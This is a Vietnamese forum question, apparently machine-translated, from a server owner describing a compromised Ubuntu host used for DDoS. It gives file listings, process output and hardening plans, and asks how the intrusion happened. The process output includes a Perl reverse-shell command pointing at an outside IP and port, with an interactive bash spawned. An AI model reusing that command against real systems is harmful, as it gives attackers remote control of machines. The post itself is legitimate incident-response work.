Tôi có một máy chủ Ubuntu đang chạy. Hôm nay tôi thấy rằng máy chủ đã bị hack và đang được sử dụng cho DDoS thông qua báo cáo lạm dụng amazon.
Tôi tìm thấy những điều sau đây trên máy chủ.
Các tập tin đáng ngờ sau đây trên máy chủ.
-rw-r--r-- 1 www-data www-data 759 Dec 21 15:38 weiwei.pl
-rwxrwxrwx 1 www-data www-data 1223123 Dec 26 02:20 huizhen
-rwxr-xr-x 1 www-data www-data 5 Jan 26 14:21 gates.lod
-rwxrwxrwx 1 www-data www-data 1135000 Jan 27 14:09 sishen
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.5
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.4
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.3
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.2
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.1
-rwxr-xr-x 1 www-data www-data 5 Jan 28 14:00 vga.conf
-rw-r--r-- 1 www-data www-data 119 Jan 29 06:22 cmd.n
-rw-r--r-- 1 www-data www-data 73 Feb 1 01:01 conf.n
Quá trình sau đây đã chạy
www-data 8292 10629 0 Jan28 ? 00:00:00 perl /tmp/weiwei.pl 222.186.42.207 5222
www-data 8293 8292 0 Jan28 ? 00:00:00 /bin/bash -i
www-data 8293 8292 0 Jan28 ? 00:00:00 ./huizhen
Tôi đã chạy clamav
và nó đã xóa /tmp/huizhen
và /tmp/sishen
các tập tin nhưng các quy trình vẫn đang chạy weiwei.pl
và ./huizhen
vì vậy tôi đã giết chúng bằng tay.
Tôi có các dịch vụ sau đang chạy trên máy chủ.
- SSH - Không sử dụng cổng mặc định 22, chỉ xác thực khóa
- MongoDB - Cổng được mở cho một nhóm bảo mật cụ thể
- Memcache - Cổng được mở cho một nhóm bảo mật cụ thể
- NodeJS - Cổng được mở cho một nhóm bảo mật cụ thể
- Các cổng Tomcat - 8080/8443 được công khai cho dịch vụ web trục2 và solr
Giả định của tôi là tin tặc đã xâm nhập vào một số lỗ hổng tomcat / ax2 / solr vì quá trình này đang chạy bằng cách sử dụng cùng một nhóm người dùng như tomcat.
Tôi đã chặn các cổng 8080/8443 và sẽ thay thế máy chủ bằng một cổng mới. Tomcat sẽ có thể truy cập từ một máy chủ khác thông qua nginx. Tôi cũng đã cài đặt các bản vá bảo mật bằng cách sử dụng các nâng cấp không giám sát .
Vấn đề là làm thế nào để tìm ra cách hacker xâm nhập và trồng trojan. Những bước khác tôi có thể làm để thắt chặt an ninh.